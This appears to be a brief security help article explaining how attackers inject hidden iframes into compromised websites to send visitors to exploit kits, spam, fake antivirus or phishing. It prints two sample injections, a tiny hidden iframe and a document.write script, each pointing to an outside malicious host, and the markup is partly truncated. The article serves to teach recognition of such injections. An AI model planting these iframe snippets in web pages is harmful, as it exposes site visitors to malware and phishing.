An inline frame (iframe) is used to embed another document within the current HTML document.
Why is it used by the "bad guys"?
Because as the definition implies, it allows you to insert another document inside the current HTML page. The attackers use that feature to insert malicious content into the compromised site (to redirect to spam, exploit kits, Fake AV, phishing, etc).
Example of malframes (malware iframes):
Iframes can be injected and hidden in different ways inside websites, but this is how it looks to the web browser (if you use view-source
):
<iframe height="2" width="2...</code"></iframe>
This code loads whatever content is inside rec-creations.com/adv.php and is executed by the browser of the victim.
Encoded iframe
Iframes can also be encoded inside a javascript call, like this one:
<script type="text/javascript">document.write("<iframe src="http://objectcash.in/in.cgi?19" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2...
Was this article helpful?